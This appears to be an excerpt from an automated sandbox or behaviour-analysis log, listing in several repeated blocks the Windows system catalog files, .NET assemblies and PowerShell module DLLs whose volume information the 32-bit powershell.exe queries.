Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
